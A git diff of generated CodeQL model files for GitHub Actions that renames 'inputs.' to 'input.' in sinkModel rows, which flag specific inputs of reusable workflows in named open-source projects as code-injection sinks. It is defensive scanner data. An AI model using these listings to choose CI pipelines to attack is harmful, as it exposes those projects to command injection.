a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index 3b7122a7a139..f469f5de268d 100644 
--- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 3e80edaaaff5..7ec8dac3f7bb 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index 99717acf0244..4ce9252ce76c 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/ini/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index d9a066c2b220..abb5b43c3276 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index 83e68740ac09..9e9da70e88ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index 45f05ea88263..8de3f4c1ca4a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 1cd25da918fa..5ec8c0969346 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index 2d5a077f1f48..af9582282d0d 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/node-which/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 98571dfc5d94..61bbb9d53728 100644 
--- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/nopt/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index 8cbd1927fe0c..fdb440a742ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index 6d3466f09274..efd05d69abe4 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index c7178a298efc..9be191425ffd 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.base-branch", "code-injection", "generated"] - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.repo", "code-injection", "generated"] - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.current-branch", "code-injection", "generated"] - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.chain", "code-injection", "generated"] \ No newline at end of file + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.repo", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.current-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.chain", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index 08feb2033ffb..65a14c7cfaa1 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/macos-build.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/macos-build-arm.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/linux-build-gcc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/linux-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] \ No newline at end of file + - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build-arm.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-gcc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index 3483cc13b9e2..2c031ea9dc62 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index 45350e121a04..b90aacee9ca1 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "inputs.project-name", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 9665157b3ad4..56823f4e1acc 100644 
--- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-build-commands", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-build-commands", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 9ef65a67c038..0f2937f9d148 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "inputs.success", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "inputs.project", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "input.project", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index eade5ecdae1d..a88c74f85375 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "inputs.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index 1478244cc9ca..b7dfd8fcc9b1 100644 
--- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "inputs.language", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.org", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.org", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index 8bb0915294cd..9de8130a93e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] \ No newline at end of file + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.go-arch", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.binary-tests", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index cba6c4fbe5a5..ea4980b8cd7a 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_name", "code-injection", "generated"] - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_file", "code-injection", "generated"] - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_file", "code-injection", "generated"] - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_folder", "code-injection", "generated"] \ No newline at end of file + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_folder", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index 448d48f661db..8787c7e32c9a 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.release_platform", "code-injection", "generated"] - - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.syft_version", "code-injection", "generated"] \ No newline at end of file + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index 50eb3b1af36a..ea55d53c215f 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.package-name", "code-injection", "generated"] - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.product-version", "code-injection", "generated"] - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goarch", "code-injection", "generated"] - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.product-version", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.goarch", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index 780fa92d20cc..add2fe0d2e2e 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml 
@@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "inputs.survey_key", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "inputs.trigger_type", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/upload-cdn.yml", "*", "inputs.version", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/release-macos.yml", "*", "inputs.survey_key", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/release-linux.yml", "*", "inputs.survey_key", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/release-docs.yml", "*", "inputs.version", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-windows.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.full_arch", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.libraries", "code-injection", "generated"] \ No newline at end of file + - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "input.trigger_type", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-cdn.yml", "*", "input.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-macos.yml", "*", "input.survey_key", "code-injection", "generated"] + - 
["openttd/openttd/.github/workflows/release-linux.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-docs.yml", "*", "input.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-windows.yml", "*", "input.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.full_arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "input.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "input.libraries", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index 275d46772a2d..400cd50b59f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "inputs.model_scope", "code-injection", "generated"] \ No newline at end of file + - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 271c80c575e2..42122b5ee22a 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_test_tensorflow_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_rocm.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_build_packages.yml", "*", "inputs.package_version", "code-injection", "generated"] \ No newline at end of file + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_test_tensorflow_cpu.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_cpu.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_rocm.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_build_packages.yml", "*", "input.package_version", 
"code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index 0f4ad0a7ca70..c694d3953f63 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index c38ae9258600..9ecf401cab50 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml 
